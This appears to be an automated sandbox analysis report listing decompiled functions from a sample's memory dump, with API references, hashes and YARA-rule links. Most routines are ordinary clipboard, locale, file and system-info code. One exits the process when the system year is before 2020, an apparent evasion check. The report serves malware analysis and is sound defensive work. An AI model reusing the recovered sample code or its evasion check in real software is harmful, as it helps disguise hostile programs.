Opcode Fuzzy Hash: 2a1b0f335cfb047a4e136eb7a30ad2bf1dc10676cf6e92bdf0c91ebf052f28ad
Instruction Fuzzy Hash: 98318C7160420097C720AB3DC8C675A72969B4E398F14A53FB456E73E6DB7CDC0A874D

Uniqueness

Uniqueness Score: -1.00%

Function 0043258C, Relevance: 4.5, APIs: 3, Instructions: 43
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0043258C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx) {
				intOrPtr* _v8;
				void* _v12;
				void* _t27;
				intOrPtr _t33;
				void* _t36;
				void* _t38;

				_t27 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(__ebx, _t36);
				_v12 = GetClipboardData(1);
				_push(_t38);
				_push(0x4325fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38 + 0xfffffff8;
				if(_v12 == 0) {
					E00404320(_t27);
				} else {
					GlobalFix(_v12);
					E00404510(_t27, _v12);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x432605);
				if(_v12 != 0) {
					GlobalUnWire(_v12);
				}
				return  *((intOrPtr*)( *_v8 + 0x14))();
			}

0x00432593
0x00432595
0x0043259d
0x004325a7
0x004325ac
0x004325ad
0x004325b2
0x004325b5
0x004325bc
0x004325d4
0x004325be
0x004325c2
0x004325cb
0x004325cb
0x004325db
0x004325de
0x004325e1
0x004325ea
0x004325f0
0x004325f0
0x004325fd

APIs

GetClipboardData.USER32 ref: 004325A2
GlobalFix.KERNEL32 ref: 004325C2
GlobalUnWire.KERNEL32 ref: 004325F0

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$ClipboardDataWire
String ID:
API String ID: 2697403597-0
Opcode ID: 268b32843f98601f9ed9c1661c6937a6bf6279bcea56f4c782d6d164bb799586
Instruction ID: 35f6f909bc2008549d8956aa6d9fb14dd378a360ce455bc94c4d4bb27f10abc6
Opcode Fuzzy Hash: 268b32843f98601f9ed9c1661c6937a6bf6279bcea56f4c782d6d164bb799586
Instruction Fuzzy Hash: 7F019A70A00204EFCB00DFA9CA55A8EB7B4EB4C300F2140B6B501A7691DA789E90DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004574D0, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004574D0() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x48fc0c = GetCurrentThreadId();
				L5:
				_t5 =  *0x48fc10; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x48fbfc != 0 &&  *((intOrPtr*)( *0x48fbfc + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00437534( &_v12) == 0) {
							E00459870( *0x48fbfc);
						}
					}
					goto L5;
				}
				return _t6;
			}

0x004574e1
0x00457511
0x00457513
0x00457519
0x00457523
0x004574eb
0x004574f9
0x00457508
0x0045750c
0x0045750c
0x00457508
0x00000000
0x004574eb
0x00457529

APIs

GetCurrentThreadId.KERNEL32 ref: 004574DC
GetCursorPos.USER32(?), ref: 004574F9
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00457519

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: a58b5eb6d08d89c790b83732d624bfe9ffd36f7db25992e6818a3d146b86ff75
Instruction ID: b648779530b1b9d472df8d98ef6d4c4ce2de8558f9b4746ab8b2fefce9ed3ee3
Opcode Fuzzy Hash: a58b5eb6d08d89c790b83732d624bfe9ffd36f7db25992e6818a3d146b86ff75
Instruction Fuzzy Hash: 19F0B47151820CABDB10F765EC86B5A339CAB0131AF4048BBED01D62D2EB3DD998C71D

Uniqueness

Uniqueness Score: -1.00%

Function 004703B0, Relevance: 4.5, APIs: 3, Instructions: 18
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004703B0(signed int __eax) {
				signed int _t3;
				signed int _t6;
				struct _SYSTEMTIME* _t8;

				_t3 = __eax;
				_t6 = __eax;
				GetSystemTime(_t8);
				if(_t8->wYear < 0x7e4) {
					ExitProcess(0);
				}
				_push(0);
				L00406C68();
				return _t3 & 0xffffff00 | _t6 == 0x80000001;
			}

0x004703b0
0x004703b4
0x004703b7
0x004703c2
0x004703c6
0x004703c6
0x004703d6
0x004703d8
0x004703e3

APIs

GetSystemTime.KERNEL32 ref: 004703B7
ExitProcess.KERNEL32(00000000), ref: 004703C6
6D8725A0.OPENGL32(00000000), ref: 004703D8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: D8725ExitProcessSystemTime
String ID:
API String ID: 3719352652-0
Opcode ID: 6d6afbdbfd0c0f971f8f4c6101cfce2909d56d654d61b92e545c40d4e0795ad8
Instruction ID: ece89120a57ec2b3e6381a3ffa9659a35ffcfc5582ea46c19b3631b3ee57f7f0
Opcode Fuzzy Hash: 6d6afbdbfd0c0f971f8f4c6101cfce2909d56d654d61b92e545c40d4e0795ad8
Instruction Fuzzy Hash: 90D0C74174A20016EA5036750DC37AD10449701735F55493FFD59993C2D5AE05B4517B

Uniqueness

Uniqueness Score: -1.00%

Function 0043E4F4, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043E4F4(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043E444(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x48e6ec; // 0x48fbfc
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E004500B0(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00439EA4(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}

0x0043e4fa
0x0043e4fd
0x0043e50f
0x0043e56d
0x0043e57d
0x0043e58c
0x00000000
0x0043e593
0x0043e582
0x0043e58a
0x00000000
0x00000000
0x0043e53e
0x0043e53e
0x0043e548
0x00000000
0x0043e54a
0x0043e54c
0x0043e551
0x0043e555
0x00000000
0x0043e557
0x0043e564
0x0043e56b
0x00000000
0x00000000
0x0043e56b
0x0043e555
0x0043e548
0x0043e59a

APIs

IsIconic.USER32 ref: 0043E52C
GetCapture.USER32 ref: 0043E535

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 111bcf99bdd9a8e416fb45b7f80940d8edb6b0b5147044fe8d06d636342efa33
Instruction ID: 81b4d58bb38cd2491c99ed8dd3ea13819e987d2c4e8a4a2e139a2dc2f90a531e
Opcode Fuzzy Hash: 111bcf99bdd9a8e416fb45b7f80940d8edb6b0b5147044fe8d06d636342efa33
Instruction Fuzzy Hash: 60118231701205EBEB20EB9AC58596AB3E5AF0C348F64647AF404EB392FB78DD049748

Uniqueness

Uniqueness Score: -1.00%

Function 00420594, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00420594(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x420630);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00420540(_t22);
				} else {
					E00404588( &_v264, 0x100,  &_v260);
					E0040A0E8(_v264, 1);
					E00403D80();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00420637);
				return E00404320( &_v264);
			}

0x004205a0
0x004205a8
0x004205a9
0x004205ae
0x004205b1
0x004205b9
0x004205bd
0x00420612
0x004205e3
0x004205f4
0x00420606
0x0042060b
0x0042060b
0x00420619
0x0042061c
0x0042061f
0x0042062f

APIs

GetLastError.KERNEL32(00000000,00420630,?,00000000,?,00420648,00000000,00423F6F,00000000,00000000,0042410F,?,00000000,?,?), ref: 004205B4
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00420630,?,00000000,?,00420648,00000000,00423F6F,00000000), ref: 004205DA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6ccfb14fa0d11755d6d08eef36658aea9c81fa97476b82b2bca2a1dbf23e35c6
Instruction ID: ddd67f150343a9a78a1b5952b59a894d77cac6f74691603cb54e20a43b9da6d7
Opcode Fuzzy Hash: 6ccfb14fa0d11755d6d08eef36658aea9c81fa97476b82b2bca2a1dbf23e35c6
Instruction Fuzzy Hash: 1101D8703002186BE711EB619C92BD5B2E8DB84704F91447BBA44A22C2DAB86D54891D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040ACF0(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40ad54);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404588( &_v16, 7,  &_v11);
				_push(_v16);
				E00408740(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040AD5B);
				return E00404320( &_v16);
			}

0x0040acf0
0x0040acf9
0x0040acfe
0x0040acff
0x0040ad04
0x0040ad07
0x0040ad16
0x0040ad26
0x0040ad2e
0x0040ad37
0x0040ad40
0x0040ad43
0x0040ad46
0x0040ad53

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AD54), ref: 0040AD16
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AD54), ref: 0040AD2F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 77f62c95fb7e918c7d2009dbccb762d56bc75d5de92aab2a442e831bd1390d5b
Instruction ID: 65eea9cc501be0bab24ed8d79dc14c6897f0298a4fc65be17d77a0b2f403ab22
Opcode Fuzzy Hash: 77f62c95fb7e918c7d2009dbccb762d56bc75d5de92aab2a442e831bd1390d5b
Instruction Fuzzy Hash: 51F0F671E043047BEB00EBB2CC4299EB36FDBC4718F90C47AB610B35C0EA7C65108654

Uniqueness

Uniqueness Score: -1.00%

Function 00408938, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408938(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E004047D0(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E004088D4(_t15);
					if(_t22 != 0) {
						E004089AC(_t15);
					}
				}
				return _t22;
			}

0x0040893b
0x00408944
0x00408958
0x0040895a
0x00408960
0x0040897d
0x00408962
0x00408969
0x0040896d
0x00408971
0x00408971
0x0040896d
0x00408984

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 00408953
GetLastError.KERNEL32(00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 00408978

Part of subcall function 004088D4: FileTimeToLocalFileTime.KERNEL32(?), ref: 00408901
Part of subcall function 004088D4: FileTimeToDosDateTime.KERNEL32 ref: 00408910

Part of subcall function 004089AC: FindClose.KERNEL32(?,?,00408976,00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 004089B8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 1e288328fed181064df11d7fb29f27d6540e8c9e6fc1a6b65a63f4393e9c87ad
Instruction ID: a4c810d5daf1d518932f7d09b08806f352e8784f0defa3d5e028af5794bd5699
Opcode Fuzzy Hash: 1e288328fed181064df11d7fb29f27d6540e8c9e6fc1a6b65a63f4393e9c87ad
Instruction Fuzzy Hash: ACE065B3B0112017C7147E6E5D8196B61984A847A8709427FB995FB3D6DE3CCC1143DA

Uniqueness

Uniqueness Score: -1.00%

Function 00408B02, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B02(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004052B0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004052B0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x00408b0b
0x00408b10
0x00408b12
0x00408b12
0x00408b25
0x00408b34
0x00408b37
0x00408b44
0x00408b47
0x00408b4c
0x00408b4f
0x00408b51
0x00408b5e
0x00408b61
0x00408b66
0x00408b69
0x00408b6b
0x00408b74

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408B25

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: e0983e28c4aea409309b8b571afeaab98e811c969ab897b82128a6dfb64f703a
Instruction ID: 3bce85ac5653d17904fca8f9c876949c4192ad64dac41f5d0a902c7bea582b35
Opcode Fuzzy Hash: e0983e28c4aea409309b8b571afeaab98e811c969ab897b82128a6dfb64f703a
Instruction Fuzzy Hash: 891100B5E01609AFDB00CF99C8819AFB7F9EFC8304B14C569A505E7254E6319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8BC, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042E8BC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00406D08();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42e8f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004037B0(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}

0x0042e8c5
0x0042e8c8
0x0042e8ca
0x0042e8d0
0x0042e914
0x0042e918
0x0042e919
0x0042e91d
0x0042e920
0x0042e921
0x0042e926
0x00000000
0x0042e926
0x0042e8d5
0x0042e8da
0x0042e8dd
0x0042e8e7
0x0042e8ee
0x0042e8f1
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042E921

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 5fd91e4882b7d4b51eaa1c6e2a319d28cb952b6fd541d4587ae446bb00d3fdec
Instruction ID: a99603b4774d403f5c425303500a1d107946dd2ed8f098ff2a7340b667ae1876
Opcode Fuzzy Hash: 5fd91e4882b7d4b51eaa1c6e2a319d28cb952b6fd541d4587ae446bb00d3fdec
Instruction Fuzzy Hash: FDF0F6B6704214AFDB40DF9BE881C56BBECEB0932039140B7F904D7341D235AD009B74

Uniqueness

Uniqueness Score: -1.00%

Function 00420B24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420B24(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x00420b2a
0x00420b2d
0x00420b30
0x00420b34
0x00420b39
0x00420b3f
0x00420b40
0x00420b4a
0x00420b5d
0x00420b66
0x00420b6e
0x00420b71
0x00420b71
0x00000000
0x00000000
0x00000000
0x00000000
0x00420b4c
0x00420b4c
0x00420b4f
0x00420b51
0x00420b54
0x00420b57
0x00420b57
0x00000000
0x00420b4c
0x00420b78

APIs

GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F), ref: 00420B34

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a725acbe750598fa7dcf7ac34f2f70601eb1af39f9a3eff6cf881c1528af22a8
Instruction ID: 77e0b73c13ff2e563e634a35a7d2c13a73f4324c183021a29b3267c8cb907b35
Opcode Fuzzy Hash: a725acbe750598fa7dcf7ac34f2f70601eb1af39f9a3eff6cf881c1528af22a8
Instruction Fuzzy Hash: AFF0CD72A0011C9FCB20DED8C488C9CBFB4FA56305B8042EAC408E7342EB78A690CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409940, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409940(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404374(_t10, _t18);
				}
				return E00404410(_t10, _t5 - 1,  &_v260);
			}

0x0040994b
0x0040994d
0x00409965
0x00000000
0x0040997d
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 601acd154a8726646306cb7902fb679922c22feea1ffdd8a371958e4f1bb7313
Instruction ID: b0e6d8d5d631d164689d9758e55eafa877a85ca348b557507cc080045d280286
Opcode Fuzzy Hash: 601acd154a8726646306cb7902fb679922c22feea1ffdd8a371958e4f1bb7313
Instruction Fuzzy Hash: A0E092B270021416D310A5595C82EEAB25CA798354F00427FBE45E73D2EDB49E8086E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040998C, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040998C(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x0040998f
0x00409990
0x004099a6
0x004099ad
0x004099a8
0x004099a8
0x004099a8
0x004099b3

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B002,00000000,0040B21B,?,?,00000000,00000000), ref: 0040999F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 30b854cd48461b27ede31c3797ada21d26d2e7b65f28032653e8630c86dddf53
Instruction ID: c3187cab53ebb56b3c59762355c8a62df768741a76e81424565258229681cb70
Opcode Fuzzy Hash: 30b854cd48461b27ede31c3797ada21d26d2e7b65f28032653e8630c86dddf53
Instruction Fuzzy Hash: 3CD05EA631E2502AE210615A2D85DBB5BACCAC57A1F10403EB588D6382D2288C06D3B6

Uniqueness

Uniqueness Score: -1.00%

Function 0040703E, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ee5d47ace2b2fd4937d3b555c45ae1a41de6232810b8eec9b3d31809db5446
Instruction ID: ea13d304944b2c0951bb2872d28567620e2b23670e64cbf9492c260b541986fc
Opcode Fuzzy Hash: d9ee5d47ace2b2fd4937d3b555c45ae1a41de6232810b8eec9b3d31809db5446
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004207E0, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

